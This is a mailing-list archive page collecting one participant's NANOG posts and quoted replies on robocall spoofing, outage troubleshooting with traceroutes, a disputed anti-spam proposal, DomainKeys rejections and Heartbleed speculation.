Phishing and telemarketing telephone calls

2020-04-24 Thread Matthew Black
Has anyone else noticed a steep decline in annoying phone calls since the FCC 
threatened legal action against three major VOIP gateways if they didn't make 
efforts to prevent Caller ID spoofing from scammers?


Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.



RE: Phishing and telemarketing telephone calls

2020-04-24 Thread Matthew Black
Oh, never mind. I just saw a similar thread: FCC and FTC Demand Cut-Off 
Robocallers of Coronavirus Scam

The free Marriott vacation and Social Security Number suspension calls are no 
more!



From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Matthew Black
Sent: Friday, April 24, 2020 4:26 PM
To: North American Network Operators' Group
Subject: Phishing and telemarketing telephone calls

Has anyone else noticed a steep decline in annoying phone calls since the FCC 
threatened legal action against three major VOIP gateways if they didn't make 
efforts to prevent Caller ID spoofing from scammers?


Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.



RE: Phishing and telemarketing telephone calls

2020-04-25 Thread Matthew Black
Good grief, selling a kit for $47. Since all robocalls employ Caller ID 
spoofing, just how does one prove who called? Will the telephone company simply 
hand over detailed transport records or the hidden Caller ID information? I 
don't care about making money or imposition of government fines; I just want 
the calls to cease.

mb

Writing on behalf of myself and not any organization or employer. Please remove 
me from your mailing and contact lists.



-----Original Message-----
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Anne P. Mitchell, Esq.
Sent: Saturday, April 25, 2020 10:23 AM
To: nanog@nanog.org
Subject: Re: Phishing and telemarketing telephone calls



> On Apr 24, 2020, at 5:36 PM, Jon Lewis  wrote:
> 
> On Fri, 24 Apr 2020, Matthew Black wrote:
> 
>> Has anyone else noticed a steep decline in annoying phone calls since the 
>> FCC threatened legal action against three major VOIP gateways if they didn’t 
>> make efforts to prevent
>> Caller ID spoofing from scammers?
> 
> Not that it's at all on-topic for NANOG, but no.  I still get numerous "last 
> chance to renew my car warranty" and whatever the scam is from the credit 
> card callers per day on both my home and cell numbers.

Well, while we are already engaged in the thread, some of you may be interested 
to know (especially if you find yourself with time on your hands these days), 
that you *can* actually get money from these scum.  In fact, it turns out that 
they cave pretty easily because they *know* they are violating the law, and 
they *know* what the penalties are.  

In fact, we wrote up how to do it (link below) and I *know* that it works 
because I just got myself $1000 out of a text message spammer!   

So, harass those phone spammers for fun *and* profit! ;-)  Here's the write-up 
I did, feel free to ask me any questions you may have. :-)

https://www.theinternetpatrol.com/how-to-shake-down-robocallers-and-robotexters-for-fun-and-profit/

Anne

--
Anne P. Mitchell, Attorney at Law
Dean of Cyberlaw & Cybersecurity, Lincoln Law School
CEO/President, SuretyMail Email Reputation Certification
Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law)
Legislative Consultant, GDPR, CCPA (CA) & CCDPA (CO) Compliance Consultant
Board of Directors, Denver Internet Exchange
Former Counsel: Mail Abuse Prevention System (MAPS)



RE: [outages] facebook slow

2018-12-02 Thread Matthew Black
My concern against using FB for authentication is this: Does using FB login 
give the site read access to my profile, friends, etc? My profile is set to 
private to keep advertisers at bay. In the early years Facebook warned users 
that clicking on an external link would grant such access.

matthew


-----Original Message-----
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of valdis.kletni...@vt.edu
Sent: Friday, November 30, 2018 1:12 PM
To: Keith Medcalf
Cc: nanog@nanog.org; Brian Ladd
Subject: Re: [outages] facebook slow

On Fri, 30 Nov 2018 13:16:31 -0700, "Keith Medcalf" said:
> Why don't you just write all your password on big sheets of 
> construction paper and put them on the front of the building or in the 
> nearest Starbucks?

I'm going to go out on a limb and say that with all the problems inherent in 
using a social media account as an authenticator, for 95% of sites it's still 
more secure than if they attempted to create their own authentication system.
Having even less security expertise than Facebook, they will probably get it wrong 
(possibly in a subtle fashion that gets quietly exploited for years, and 
possibly in a spectacular fashion that makes it on the evening news).

There's the additional factor that security is always about trade-offs - for 
many sites, the dangers of using social media logins are *far* outweighed by 
being able to just have a big shiny "Log in using Facebook" button instead of 
making the user set up an account, pick a password, send them a verification 
e-mail, then they have to read their e-mail and click on the link.  Do that, 
and they just left for another site.  Doesn't take many people leaving for 
another site before any added "security" added by doing authentication yourself 
is outweighed by lost traffic.




RE: A Zero Spam Mail System [Feedback Request]

2019-02-20 Thread Matthew Black
SIGH. I am far more inclined to listen to John Levine or Suresh 
Ramasubramanian, both who have been around for decades and have earned their 
chops with DMARC and Sendmail. Both with a proven track record, rather than 
someone lacking credentials. Since spam is a subjective term, I’d personally 
like to know how someone can design a solution that works for billions of 
people. Heck, you need to improve over existing technology that provides a 
false negative rate p < 0.01 and false positive p < 0.005.

Someone who thinks Gmail is e-mail 1.0 fails to grasp history. Have you ever 
created a sendmail.cf without using M4?

[This message represents views of the author and not any employer (present or 
former).]


From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Viruthagiri 
Thirumavalavan
Sent: Sunday, February 17, 2019 6:04 PM
To: nanog list
Subject: A Zero Spam Mail System [Feedback Request]

Hello Everyone,

My name is Viruthagiri Thirumavalavan. I'm the guy who proposed SMTP over TLS 
on Port 26 last month. I'm also the guy who attacked (???) John Levine.

Today I have something to show you.

Long story short I solved the email spam problem. Well... Actually I solved 
it long time back. I'm just ready to disclose it today. Again...

Yeah.. Yeah.. Yeah... If only I had a dime for every time people insult me for 
saying "I solved the spam problem"

They usually start with the insult like "You think you are the inventor of 
FUSSP?"

These guys always are the know-it-all assholes. They don't listen. They don't 
want to listen. They are like barking dogs. If one started to bark, everyone 
else gets the courage to do the same thing.

I'm tired of fighting these assholes in every mailing list.  I'm on your side 
morons. So how about you all knock it off?

Six months back, it was John Levine who humiliated me in the DMARC list. 
Apparently, for him 50 words are enough to attack me.

Töma Gavrichenkov and Suresh Ramasubramanian even started to defend this man 
saying 50 words are enough to judge a 50,000 words paper.  [We are gonna figure 
it out today]

--

@Töma Gavrichenkov

In theory, I can easily recall a few cases in my life when going
through just 50 words was quite enough for a judgment.

How can you be so sure that you didn't fuck up none of the lives of these "few 
cases"? Or in more technical terms, How can you be absolutely sure that there 
is no "False Positives"?

--

@Suresh Ramasubramanian

Yes, 50 words are more than enough to decide a bad idea is bad.  You don't have 
to like that, or like any of us, but facts are facts

Merely appending the text "facts are facts" not gonna convert a bullshit 
statement into a fact.

You know what's the meaning of the word "fact"? It's a statement that can be 
proved TRUE.

Let's do a little experiment. 100 researchers presents their lifetime work to 
us. Each of their research paper contain 50,000 words. We are gonna judge them.

You are gonna judge them based on only the first 50 words. And I'm gonna judge 
them by tossing a coin. Can you guess who is gonna fuck up less number of 
researcher lives?

I'm claiming that I solved the email spam problem. If that's true, then you 
should know, common sense is one of the very basic requirement for that.

I designed my email system. Every inch of it. I wrote my research paper. Every 
word of it. I made my prototype video. Every second of it. So I'm the captain 
of my ship. Not you. But you all think you know my system better than me? That 
too, with only 50 words?

My research paper has around 50,000 words. And you think 50 words are enough to 
judge my work? Let me make sure I get this right. You are all saying, you know 
what's in the rest of the 49,950 words based on only the first 50 words? That's 
stupid on so many levels.

If you are gonna do a half-assed job and relay that misinformation to thousands 
of people, why volunteer in the first place? And by the way, by saying you are 
all doing half-assed job, I'm actually insulting the people who are REALLY 
doing the half-assed job.

--

John Levine vs. me

One month back, some of you may have noticed a thread created by John Levine 
where he goes like "He's Forum Shopping". The whole gist of that message was 
"We already have DANE and MTA-STS. We don't a third solution". And then I used 
some harsh words to defend myself. But that was the Season 2 of his "Shitshow". 
The Season 1 was aired 6 months back. You all missed that show. This is what 
happened in Season 1.


  1.  Six months back, I posted on three mailing list saying "I solved the 
email spam problem" and asked them to provide feedback on my invention. Those 
three mailing lists were SPF, DKIM and DMARC. That's because my solution r

RE: FCC chairwoman: Fines alone aren't enough (Robocalls)

2022-10-04 Thread Matthew Black
I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

Matthew


From: NANOG < > On Behalf Of Shane Ronan
Sent: Tuesday, October 04, 2022 11:22 AM
To: Michael Thomas 
Cc: nanog@nanog.org
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)

CAUTION: This email was sent from an external source.

Except the cost to do the data dips to determine the authorization isn't "free".

On Tue, Oct 4, 2022 at 2:18 PM Michael Thomas <m...@mtcc.com> wrote:


On 10/4/22 6:07 AM, Mike Hammett wrote:
I think the point the other Mike was trying to make was that if everyone 
policed their customers, this wouldn't be a problem. Since some don't, 
something else needed to be tried.


Exactly. And that doesn't require an elaborate PKI. Who is allowed to use what 
telephone numbers is an administrative issue for the ingress provider to 
police. It's the equivalent to gmail not allowing me to spoof whatever email 
address I want. The FCC could have required that ages ago.



Mike

-
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com

Midwest-IX
http://www.midwest-ix.com


From: "Shane Ronan" 
To: "Michael Thomas" 
Cc: nanog@nanog.org
Sent: Monday, October 3, 2022 9:54:07 PM
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)
The issue isn't which 'prefixes' I accept from my customers, but which 
'prefixes' I accept from the people I peer with, because it's entirely dynamic 
and without doing a database dip on EVERY call, I have to assume that my peer 
or my peers customer or my peers peer is doing the right thing.

I can't simply block traffic from a peer carrier, it's not allowed, so there 
has to be some mechanism to mark that a prefix should be allowed, which is what 
Shaken/Stir does.

Shane



On Mon, Oct 3, 2022 at 7:05 PM Michael Thomas <m...@mtcc.com> wrote:
The problem has always been solvable at the ingress provider. The
problem was that there was zero to negative incentive to do that. You
don't need an elaborate PKI to tell the ingress provider which prefixes
customers are allowed to assert. It's pretty analogous to when submission
authentication was pretty nonexistent with email... there was no
incentive to not be an open relay sewer. Unlike email spam, SIP
signaling is pretty easy to determine whether it's spam. All it needed
was somebody to force regulation which unlike email there was always
jurisdiction with the FCC.

Mike

On 10/3/22 3:13 PM, Jawaid Bazyar wrote:
> We're talking about blocking other carriers.
>
> On 10/3/22, 3:05 PM, "Michael Thomas" <m...@mtcc.com> wrote:
>
>  On 10/3/22 1:54 PM, Jawaid Bazyar wrote:
>  > Because it's illegal for common carriers to block traffic otherwise.
>
>  Wait, what? It's illegal to police their own users?
>
>  Mike
>
>  >
>  > On 10/3/22, 2:53 PM, "NANOG on behalf of Michael Thomas" 
> mailto:verobroadband@nanog.org>
>  on behalf of m...@mtcc.com> wrote:
>  >
>  >
>  >  On 10/3/22 1:34 PM, Sean Donelan wrote:
>  >  > 'Fines alone aren't enough:' FCC threatens to blacklist voice
>  >  > providers for flouting robocall rules
>  >  >
>  >  > 
> https://www.cyberscoop.com/fcc-robocall-fine-database-removal/
>  >  >
>  >  > [...]
>  >  > “This is a new era. If a provider doesn’t meet its obligations 
> under
>  >  > the law, it now faces expulsion from America’s phone networks. 
> Fines
>  >  > alone aren’t enough,” FCC chairwoman Jessica Rosenworcel said 
> in a
>  >  > statemen

RE: FCC chairwoman: Fines alone aren't enough (Robocalls)

2022-10-05 Thread Matthew Black
This might have been what I read years ago:

Teltech Systems Inc. v. Bryant, 5th Cir., No. 12-60027

https://news.bloomberglaw.com/us-law-week/states-cant-restrict-non-harmful-spoofing-preempted-by-federal-truth-in-caller-id-act
(requires login)

https://law.justia.com/cases/federal/appellate-courts/ca5/12-60027/12-60027-2012-12-10.html

matthew


From: Tom Beecher 
Sent: Wednesday, October 05, 2022 7:42 AM
To: Matthew Black 
Cc: nanog@nanog.org
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)


I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

If you are referring to Facebook v. Duguid, that's not what the ruling says at 
all.



On Wed, Oct 5, 2022 at 1:23 AM Matthew Black <matthew.bl...@csulb.edu> wrote:
I thought that SCOTUS ruled years ago that telco users possess a First 
Amendment right to spoof Caller ID.

Matthew


From: NANOG < > On Behalf Of Shane Ronan
Sent: Tuesday, October 04, 2022 11:22 AM
To: Michael Thomas <m...@mtcc.com>
Cc: nanog@nanog.org
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)


Except the cost to do the data dips to determine the authorization isn't "free".

On Tue, Oct 4, 2022 at 2:18 PM Michael Thomas <m...@mtcc.com> wrote:


On 10/4/22 6:07 AM, Mike Hammett wrote:
I think the point the other Mike was trying to make was that if everyone 
policed their customers, this wouldn't be a problem. Since some don't, 
something else needed to be tried.


Exactly. And that doesn't require an elaborate PKI. Who is allowed to use what 
telephone numbers is an administrative issue for the ingress provider to 
police. It's the equivalent to gmail not allowing me to spoof whatever email 
address I want. The FCC could have required that ages ago.



Mike

-
Mike Hammett
Intelligent Computing Solutions
http://www.ics-il.com

Midwest-IX
http://www.midwest-ix.com


From: "Shane Ronan" <sh...@ronan-online.com>
To: "Michael Thomas" <m...@mtcc.com>
Cc: nanog@nanog.org
Sent: Monday, October 3, 2022 9:54:07 PM
Subject: Re: FCC chairwoman: Fines alone aren't enough (Robocalls)
The issue isn't which 'prefixes' I accept from my customers, but which 
'prefixes' I accept from the people I peer with, because it's entirely dynamic 
and without doing a database dip on EVERY call, I have to assume that my peer 
or my peers customer or my peers peer is doing the right thing.

I can't simply block traffic from a peer carrier, it's not allowed, so there 
has to be some mechanism to mark that a prefix should be allowed, which is what 
Shaken/Stir does.

Shane



On Mon, Oct 3, 2022 at 7:05 PM Michael Thomas <m...@mtcc.com> wrote:
The problem has always been solvable at the ingress provider. The
problem was that there was zero to negative incentive to do that. You
don't need an elaborate PKI to tell the ingress provider which prefixes
customers are allowed to assert. It's pretty analogous to when submission
authentication was pretty nonexistent with email... there was no
incentive to not be an open relay sewer. Unlike email spam, SIP
signaling is pretty easy to determine whether it's spam. All it needed
was somebody to force regulation which unlike email there was always
jurisdiction with the FCC.

Mike

On 10/3/22 3:13 PM, Jawaid Bazyar wrote:
> We're talking about blocking other carriers.
>
> On 10/3/22, 3:05 PM, "Michael Thomas" <m...@mtcc.com> wrote:
>
>  On 10/3/22 1:54 PM, Jawaid Bazyar wrote:
>  > Because it's illegal for common carriers to block traffic otherwise.
>
>  Wait, what? It's illegal to police their own users?
>
>  Mike
>
>  >
>  > On 

Craigslist outage

2012-01-28 Thread Matthew Black
Accessing from Southern California.

Cannot get any pages to view, except a few "about" pages.
http://www.craigslist.org/about/help/system-status.html

Status says runs good, but cannot pull up any city sites or the basic home page 
http://www.craigslist.org. 

Anyone else having trouble or are you able to get in?

matthew black
information technology services
california state university, long beach






RE: Craigslist outage

2012-01-28 Thread Matthew Black
www.craigslist.org, losangeles.craigslist.org and sfo.craigslist.org all fail.

matthew black
information technology services
california state university, long beach
562-985-5144


-----Original Message-----
From: David [mailto:dav...@mckendrick.ca] 
Sent: Saturday, January 28, 2012 1:02 AM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: Craigslist outage

Chicago loads, San Diego doesn't.
Interesting.

On Sat, 2012-01-28 at 08:56 +0000, Matthew Black wrote:
> Accessing from Southern California.
> 
> Cannot get any pages to view, except a few "about" pages.
> http://www.craigslist.org/about/help/system-status.html
> 
> Status says runs good, but cannot pull up any city sites or the basic home 
> page http://www.craigslist.org. 
> 
> Anyone else having trouble or are you able to get in?
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> 





RE: Craigslist outage

2012-01-28 Thread Matthew Black
Thanks everyone for the updates.

It looks like www.craigslist.org redirects to the nearest geographical 
craigslist site. Mine redirects to losangeles.craigslist.org, which is down.

Is it possible that some high-volume internet caching centers have gone down?

matthew black
information technology services
california state university, long beach
562-985-5144


-----Original Message-----
From: Henry Yen [mailto:he...@aegisinfosys.com] 
Sent: Saturday, January 28, 2012 1:06 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 08:56:31AM +0000, Matthew Black wrote:
> Accessing from Southern California.
> 
> Cannot get any pages to view, except a few "about" pages.
> http://www.craigslist.org/about/help/system-status.html
> 
> Status says runs good, but cannot pull up any city sites or the basic home 
> page http://www.craigslist.org. 
> 
> Anyone else having trouble or are you able to get in?

Works fine from Long Island, NY.

I see that www.craigslist.org immediately loads geo.craigslist.org;
maybe the latter is broken? (From here, it subsequently loads
longisland.craigslist.org.)

-- 
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York






RE: Craigslist outage

2012-01-28 Thread Matthew Black
Kind of supports my suspicion that a caching center (like Akamai) has gone down.

What does nslookup return for you? I get

losangeles.craigslist.org
208.82.238.129

DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).

Possible routing problems for http traffic with Verizon FIOS?

The about page comes up

matthew black
information technology services
california state university, long beach


-----Original Message-----
From: Henry Yen [mailto:he...@aegisinfosys.com] 
Sent: Saturday, January 28, 2012 1:26 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 09:14:52AM +0000, Matthew Black wrote:
> It looks like www.craigslist.org redirects to the nearest geographical 
> craigslist site. Mine redirects to losangeles.craigslist.org, which is 
> down.

losangeles.craigslist.org is working from here (Long Island, NY).

-- 
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York






RE: Craigslist outage

2012-01-28 Thread Matthew Black
IE diagnose connection problem suggests a firewall issue.

matthew black
information technology services
california state university, long beach


-----Original Message-----
From: Matthew Black [mailto:matthew.bl...@csulb.edu]
Sent: Saturday, January 28, 2012 1:32 AM
To: nanog@nanog.org
Subject: RE: Craigslist outage

Kind of supports my suspicion that a caching center (like Akamai) has gone down.

What does nslookup return for you? I get

losangeles.craigslist.org
208.82.238.129

DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).

Possible routing problems for http traffic with Verizon FIOS?

The about page comes up

matthew black
information technology services
california state university, long beach


-----Original Message-----
From: Henry Yen [mailto:he...@aegisinfosys.com]
Sent: Saturday, January 28, 2012 1:26 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 09:14:52AM +0000, Matthew Black wrote:
> It looks like www.craigslist.org redirects to the nearest geographical
> craigslist site. Mine redirects to losangeles.craigslist.org, which is
> down.

losangeles.craigslist.org is working from here (Long Island, NY).

--
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York



RE: Craigslist outage

2012-01-28 Thread Matthew Black
Confirmed that it's Verizon FIOS. I remote logged into a system at work and had 
no trouble.

I'm dealing with tech support person that says "nobody blocks websites or 
changes routing tables."  Big sigh.

Tech trying to get a supervisor and just came back with "he has another 
customer with the same problem."

Taking a deep breath.

Thanks all for your help!

matthew black
information technology services
california state university, long beach

From: Matthew Black
Sent: Saturday, January 28, 2012 1:39 AM
To: Matthew Black; nanog@nanog.org
Subject: RE: Craigslist outage


IE diagnose connection problem suggests a firewall issue.

matthew black
information technology services
california state university, long beach


-----Original Message-----
From: Matthew Black [mailto:matthew.bl...@csulb.edu]
Sent: Saturday, January 28, 2012 1:32 AM
To: nanog@nanog.org
Subject: RE: Craigslist outage

Kind of supports my suspicion that a caching center (like Akamai) has gone down.

What does nslookup return for you? I get

losangeles.craigslist.org
208.82.238.129

DOS tracert finds that IP in 9 hops (20ms, 19ms, 19ms).

Possible routing problems for http traffic with Verizon FIOS?

The about page comes up

matthew black
information technology services
california state university, long beach


-----Original Message-----
From: Henry Yen [mailto:he...@aegisinfosys.com]
Sent: Saturday, January 28, 2012 1:26 AM
To: nanog@nanog.org
Subject: Re: Craigslist outage

On Sat, Jan 28, 2012 at 09:14:52AM +0000, Matthew Black wrote:
> It looks like www.craigslist.org redirects to the nearest geographical
> craigslist site. Mine redirects to losangeles.craigslist.org, which is
> down.

losangeles.craigslist.org is working from here (Long Island, NY).

--
Henry Yen   Aegis Information Systems, Inc.
Senior Systems Programmer   Hicksville, New York



RE: WW: Colo Vending Machine

2012-02-20 Thread Matthew Black
Take a look at Raritan. We use their product to gain remote access to system 
consoles. No more driving 100s of miles. Ok, it would be 200 feet for us.


matthew black
information technology services bh-188
california state university, long beach

-----Original Message-----
From: Jon Lewis [mailto:jle...@lewis.org] 
Sent: Monday, February 20, 2012 7:35 AM
To: nanog@nanog.org
Subject: Re: WW: Colo Vending Machine

On Sat, 18 Feb 2012, John Osmon wrote:

> At my $JOB[-1] they laughed at me when I pulled a Wyse out of the 
> trash bin and stuck it on a spare crash cart.
>
> Then I fixed something while they were still looking for USB-Serial, 
> etc.

Speaking of that sort of thing, I'd really LOVE if there were a device about 
the size of a netbook that could be hooked up to otherwise headless machines in 
colos that would give you keyboard, video & mouse.  i.e. a folding netbook 
shaped VGA monitor with USB keyboard and touchpad.  I know there are folding 
rackmount versions of this (i.e. from Dell), but I want something far more 
portable.  Twice in the past month, I'd had to drive 
100+ miles to a remote colo and took a full size flat panel monitor and
keyboard with me.  Has anyone actually built this yet?

--
  Jon Lewis, MCP :)   |  I route
  Senior Network Engineer |  therefore you are
  Atlantic Net|
_ http://www.lewis.org/~jlewis/pgp for PGP public key_






RE: Dyn DDoS this AM?

2016-10-21 Thread Matthew Black
LA Times: Why sites like Twitter and Spotify were down for East Coast users 
this morning
http://www.latimes.com/business/la-fi-tn-dyn-attack-20161021-snap-story.html




-----Original Message-----
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Chris Grundemann
Sent: Friday, October 21, 2016 7:56 AM
To: nanog@nanog.org
Subject: Dyn DDoS this AM?

Does anyone have any additional details? Seems to be over now, but I'm very
curious about the specifics of such a highly impactful attack (and its
timing following NANOG 68)...

https://krebsonsecurity.com/2016/10/ddos-on-dyn-impacts-twitter-spotify-reddit/

-- 
@ChrisGrundemann
http://chrisgrundemann.com


RE: SoCal FIOS outage(?) / static IP readdressing

2017-01-04 Thread Matthew Black
I'm a Frontier FiOS customer in SoCal and have had trouble loading the Google 
home page for weeks. Had trouble loading Gmail last night. 


RE: Is LinkedIn down?

2014-08-18 Thread Matthew Black
I would cry for about 37 seconds if LinkedIn went down permanently. Then, get 
over it and not worry about their spam. Signed up when they first started but 
stopped using almost immediately when they kept requesting permission to access 
my contacts.

matthew black
[Note: speaking only for myself and not my employer or anyone else]


-----Original Message-----
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Warren Bailey
Sent: Saturday, August 16, 2014 12:31 PM
To: stuart clark; Frank Bulk; nanog@nanog.org
Subject: Re: Is LinkedIn down?

I am still seeing plenty of spam from them, so I believe they are up.

//warren

On 8/16/14, 10:49 AM, "stuart clark"  wrote:

>Frank,
>
>Reverse is ok from L3's looking glass in Washington. SRC prefix for our 
>London DC is 108.171.128.0/24.
>
>Cheers!
>On Saturday, 16 August 2014, 18:26, Frank Bulk  wrote:
> 
>
>
>Stuart,
> 
>You haven't shared your IPs but you could go to Level3's Washington 
>Looking Glass and see if you can trace back to your UK and Frankfurt IPs.
> 
>Frank
> 
>From:stuart clark [mailto:stuartecl...@yahoo.com]
>Sent: Saturday, August 16, 2014 11:45 AM
>To: Frank Bulk; nanog@nanog.org
>Subject: Re: Is LinkedIn down?
> 
>Thanks Frank - www.linkedin.com is the one i see problems with testing 
>from two locations UK and Frankfurt. London TR is below.
>If i jump out of our AMS location (ASN109 - via AS1299 ) i dont see any 
>problems.
> 
>[root@ops-netops-util1 ~]# tcptraceroute linkedin.com Selected device 
>eth0, address 10.3.4.38, port 42311 for outgoing packets Tracing the 
>path to linkedin.com (216.52.242.86) on TCP port 80 (http),
>30 hops max
> 
>[removed]
> 
> 6  xe-5-0-0.edge5.London1.Level3.net (212.187.138.209)  1.078 ms  
>1.040 ms  1.159 ms
> 7  * * *
> 8  ae-56-221.ebr2.London1.Level3.net (4.69.153.129)  76.147 ms  75.863 
>ms  75.901 ms
> 9  * * *
>10  * * *
>11  ae-48-48.ebr2.Washington1.Level3.net (4.69.202.61)  75.557 ms  
>75.550 ms  75.511 ms
>12  ae-82-82.csw3.Washington1.Level3.net (4.69.134.154)  75.700 ms
>75.502 ms  75.644 ms
>13  ae-3-80.edge3.Washington4.Level3.net (4.69.149.146)  75.639 ms
>75.726 ms  75.692 ms
>14  LINKEDIN-CO.edge3.Washington4.Level3.net (4.53.116.150)  75.888 ms
>75.924 ms  75.912 ms
>15  * * *
>16  * * *
>17  * * *
>18  * * *
>19  199.101.162.230  149.661 ms  151.158 ms  149.616 ms
>20  careers.linkedin.com (216.52.242.86) [open]  149.264 ms  149.369 ms
>149.448 ms
> 
> 
>[root@ops-netops-util1 ~]# tcptraceroute www.linkedin.com Selected 
>device eth0, address 10.3.4.38, port 57760 for outgoing packets Tracing 
>the path to www.linkedin.com (108.174.2.129) on TCP port 80 (http), 30 
>hops max
> 
>[removed]
> 
> 5  xe-5-0-0.edge5.London1.Level3.net (212.187.138.209)  1.060 ms  
>1.082 ms  1.041 ms
> 6  * * *
> 7  ae-58-223.ebr2.London1.Level3.net (4.69.153.137)  75.830 ms  75.929 
>ms  75.739 ms
> 8  * * *
> 9  * * *
>10  ae-47-47.ebr2.Washington1.Level3.net (4.69.202.57)  75.950 ms  
>76.001 ms  75.942 ms
>11  * ae-82-82.csw3.Washington1.Level3.net (4.69.134.154) 75.713 ms
>75.589 ms
>12  ae-3-80.edge3.Washington4.Level3.net (4.69.149.146)  75.702 ms
>75.769 ms  75.748 ms
>13  LINKEDIN-CO.edge3.Washington4.Level3.net (4.53.116.150)  75.973 ms
>75.924 ms  76.664 ms
>14  * * *
>15  * * *
>[timesouts]
> 
>Cheers!
> 
>-SC (ASN25605)
> 
>On Saturday, 16 August 2014, 17:03, Frank Bulk  wrote:
> 
>Stuart,
>
>You don't tell us if it's www.linkedin.com or linkedin.com, but in any 
>case, because they serve up that site around the world using some form 
>of GLB it may resolve to different IP depending on where you are.  From 
>my perspective it is working via Cogent, and I can hit 108.174.2.129, 
>too:
>
>root@nagios:# tcptraceroute www.linkedin.com
>Selected device eth0.3, address 96.31.0.5, port 43355 for outgoing packets
>Tracing the path to www.linkedin.com (199.101.163.129) on TCP port 80 (www), 30 hops max
>1  router-core-inside.mtcnet.net (96.31.0.254)  0.253 ms  0.193 ms  
>0.203 ms
>2  sxct.sxcy.mtcnet.net (167.142.156.197)  0.194 ms  0.131 ms  0.129 ms
>3  premier.sxcy-mlx.fbnt.netins.net (173.215.60.5)  1.632 ms  1.601 ms
>1.583 ms
>4  38.104.184.26  7.004 ms  6.373 ms  6.437 ms
>5  te0-0-1-1.rcr11.dsm01.atlas.cogentco.com (38.104.184.25)  5.913 ms
>6.083 ms  5.877 ms
>6  te0-2-0-0.ccr41.ord01.atlas.cogentco.com (154.54.46.237)  13.057 ms
>13.114 ms  13.075 ms
>7  be2156.ccr21.mci01.atlas.cogentco.com (154.54.6.85)  24.995 ms  
>24.942 ms  25.053  ms
>8  be2012.ccr21.dfw01.atlas.cogentco.com (154.54.2.114)  35.013 ms  
>34.942 ms  34.928 ms
>9  be2144.ccr21.iah01.atlas.cogentco.com (154.54.25.105)  40.455 ms
>40.749

Are DomainKeys for e-mail signing dead?

2014-02-28 Thread Matthew Black
Apologies if I slept through prior discussions on the topic.



E-mail from our L-Soft LISTSERV was recently rejected by Yahoo with the 
following error:



#@YAHOO.COM

Last error: 5.7.9 554 5.7.9 Message not accepted for policy reasons. See 
http://postmaster.yahoo.com/errors/postmaster-28.html



I note:



1.   The e-mail error (5.7.9) references the link  
http://postmaster.yahoo.com/errors/postmaster-28.html.

2.   That Yahoo page does not mention error 5.7.9, but references a similar 
error 5.7.4 "Message not accepted for policy reasons."

3.   It appears that Yahoo wants inbound messages signed using DomainKeys 
technology.

4.   Yahoo is the lead inventor of DomainKeys, along with Cisco, PGP, and 
Sendmail.

5.   L-Soft LISTSERV manuals and Yahoo both refer to the website 
http://domainkeys.sourceforge.net/.

6.   When I click on the Documentation and DomainKeys Implementors Mailing 
List links on that page, I get page not found.

7.   A 2007 USA Today Article 
(http://usatoday30.usatoday.com/tech/products/cnet/2007-05-23-domainkeys-anti-spam_N.htm)
 mentions that DomainKeys have not been widely adopted.

8.   A basic Google search for DomainKeys comes up with no recent articles. 
One website (http://blog.wordtothewise.com/2011/09/dkim-is-done/) says that 
DKIM/DomainKeys are dead.





Are the rumors of the death of DomainKeys premature? If not, is anyone from 
Yahoo listening?



matthew black

california state university, long beach






RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

2014-04-14 Thread Matthew Black
Shouldn't a decent OS scrub RAM and disk sectors before allocating them to 
processes, unless that process enters processor privileged mode and sets a call 
flag? I recall digging through disk sectors on RSTS/E to look for passwords and 
other interesting stuff over 30 years ago.

matthew black
california state university, long beach

-Original Message-
From: Randy Bush [mailto:ra...@psg.com] 
Sent: Sunday, April 13, 2014 7:31 AM
To: Bengt Larsson
Cc: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

> It's quite plausible that they watch the changes in open-source 
> projects to find bugs. They could do nice diffs and everything.

the point of open source is that the community is supposed to be doing this.  
we failed.

randy






RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

2014-04-14 Thread Matthew Black
Also on this same idea, in his book "The Puzzle Palace," James Bamford claims 
that we knew of the pending attack on Pearl Harbor but did nothing, because 
that would compromise we broke the Japanese Purple Cipher.

matthew black
california state university, long beach


-Original Message-
From: William Herrin [mailto:b...@herrin.us] 
Sent: Friday, April 11, 2014 2:06 PM
To: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On Fri, Apr 11, 2014 at 4:10 PM, Niels Bakker  wrote:
> Please go read up on some recent and less recent history before making 
> judgments on what would be unusually gutsy for that group of people.
>
> I'm not saying this has been happening but you will have to come up 
> with a better defense than "it seems unlikely to me personally".

Let me know when someone finds the second shooter on the grassy knoll.
As for me, I do have some first hand knowledge as to exactly how sensitive 
several portions of the federal government are to the security of the servers 
which hold their data. They may not hold YOUR data in high regard... but the 
word "sensitive" does not do justice to the attention lavished on THEIR 
servers' security.

